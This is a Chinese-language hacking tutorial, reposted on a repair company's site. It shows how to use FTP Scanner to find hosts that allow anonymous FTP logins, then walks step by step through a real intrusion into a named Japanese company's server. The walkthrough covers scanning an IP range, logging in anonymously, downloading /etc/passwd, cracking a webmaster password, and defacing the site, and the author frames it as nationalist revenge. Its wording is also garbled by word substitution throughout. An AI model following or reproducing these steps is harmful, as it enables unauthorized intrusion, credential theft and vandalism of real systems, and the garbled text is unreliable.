设为主页 | 加入收藏 | 繁體中文

关于允许匿名登陆的主机的简单入侵


  如果说一个匿名用户在FTP服务器的匿名区域获得了一份不应该是匿名用户获得的文件,那么就说明了可能有外部客户将这个文件放置在匿名的FTP区域了。
  在很多网络攻击事例中用匿名用户可以阅读到/etc/passwd文件这就是办理员很大错误体现。还有隐患是telnet到ftp21如果允许实行SITE CHMOD和SITE EXEC、/home的所有者是匿名FTP的用户,那么任意就可把权限设置成777或者更多的进行修改等等。
  先下载FTP scanner 这个软件,我们必要用到它。
  杀毒,安置好后,我们从开端菜单中的程序中找到FTP Scanner并运行它。
  我们熟悉一下我们要利用的软件的界面。
  翻开软件我们可以看到
  Host 主机
  Beginning 开端IP
  下面有几个文本框
  我们在这里填入我们要开端扫描的IP.
  Ending 结束IP
  下面有几个文本框
  我们在这里填入我们结束扫描的IP.
  在下面有一个
  Threads 线程
  我们可以根据网速来选择这里的线程数.
  通常Moden上彀选为50--70左右.
  更快的话选到100个线程.
  然后我们选择菜单Session 里的Begin FTP scan
  就可以开端了扫描了..
  ======================================
  应用技巧:
  我们可以在View 里的options选项里选择我们的扫描参数.
  在Login config里
  里的UserName 和 Password我们通常不用变动.
  但你也可以改动他.
  比如你想扫描特定的帐号.比如扫描用户 Oracle暗码也是Oracle的话
  就改动这里的 UserName 和 Password
  在IP Logging里
  我们可以变动扫描结果寄存的位置.
  任意选择一个位置和文件名就可以了.
  默认是寄存在安置目次下面的iplog.txt文件.
  ======================================
  台湾的机器我们干掉的太多了,伤及了很多布衣网站,在这里我对我以前的行为作出检讨. 这次,我们往日本看看。相信各人不会不恨小日本吧.
  去搜狐网站敲了一个“日本”,搜刮一下,找到1000多个相关网站。
  然后,任意挑了一个: www.jcbus.co.jp   ping www.jcbus.co.jp
  得到它的IP。
  210.143.99.80
  我们来扫描
  210.143.99.1-------210.143.99.254
  因为我们不是对特定的主机来攻击.现在我们做的只是在一堆机器内里找.呵呵:)
  过了几分钟
  结果出来了,找到了10台.
  我们离开安置这个扫描器的目次下查看iplog.txt
  可以看到.
  210.143.99.21
  210.143.99.68
  210.143.99.80==*
  210.143.99.94
  210.143.99.121
  210.143.99.130
  210.143.99.189
  210.143.99.175
  210.143.99.200
  210.143.99.249
  运气不错,看到了吗?
  www.jcbus.co.jp是可以匿名进去的.
  我们就进这个看看吧.:)
  C:\>ftp 210.143.99.80
  Connected to ns.jcbus.co.jp. 220 ns.jcbus.co.jp FTP server (Version wu-2.4.2-academ[BETA-15](1) Tue Jan 19 00 :22:43 GMT 1999) ready.
  User (ns.jcbus.co.jp:(none)):
  呵呵 Wu-ftp 2.4.2?
  好象有很大的毛病哦.:)
  不过不在我们本日的教程先容范围.
  我们用FTP进去看看.
  User (210.143.99.200:(none)): ftp
  331 Guest login ok, send your complete e-mail address as password.
  Password: ftp@   ----(可以任意输出)
  230-The response 'ftp' is not valid 230-Next time please use your e-mail address as your password
  230- for example: joe@202.104.49.193
  230Guest login ok, access restrictions apply.
  ftp>
  呵呵
  先看看能不能去根目次.
  ftp> cd /
  250 CWD command successful.
  ftp> ls
  200 PORT command successful.
  150 ASCII data connection for /bin/ls (202.104.49.193,2643) (0 bytes).
  bin
  cdrom
  dev
  devices
  etc
  ....
  ....
  ....
  ASCII Transfer complete.
  ftp: 161 bytes received in 0.81Seconds 0.20Kbytes/sec. ftp>
  呵呵
  实行乐成:)
  但在它的网页的目次里我没有写权限.:(
  只好先把暗码档先当下来.
  ftp> get /etc/passwd
  把暗码档搞下来.
  然后用小榕的流光提取用户.
  26个用户.
  挂上一个小字典跑.
  几分钟过去后,
  终于找到一个可以利用的shell了.
  user: webmaster
  passwd: web
  呵呵
  上载了一个剧本,后果嘛,就不用我多说了,放上一段国歌,插上国旗,找了两个网友欣赏了一下.
  1个小时后,网页规复了.
  我回去看了看ftp和webmaster都不能登岸了. 倒
  早知道给他留几个后门.:(
  这是一次关于允许匿名登岸的主机的简略入侵
  是Redhat 4.2
  实在我们可以发明,NT系统的允许匿名登岸的主机更多,很多主机更离谱的是.anonymous竟然有到根目次和写的权限,能够找到的更多,不知道他们是怎么搞的,通常可以找到的是Web是IIS4.0 IIS3.0的NT.国内的如许的机器真的不少,不过我发明日本的redhat倒真的不少.有几个网段我扫描过的竟然清一色全部是redhat.
 


    文章作者: 福州军威计算机技术有限公司
    军威网络是福州最专业的电脑维修公司,专业承接福州电脑维修、上门维修、IT外包、企业电脑包年维护、局域网网络布线、网吧承包等相关维修服务。
    版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章原始出处 、作者信息和声明。否则将追究法律责任。

TAG:
评论加载中...
内容:
评论者: 验证码: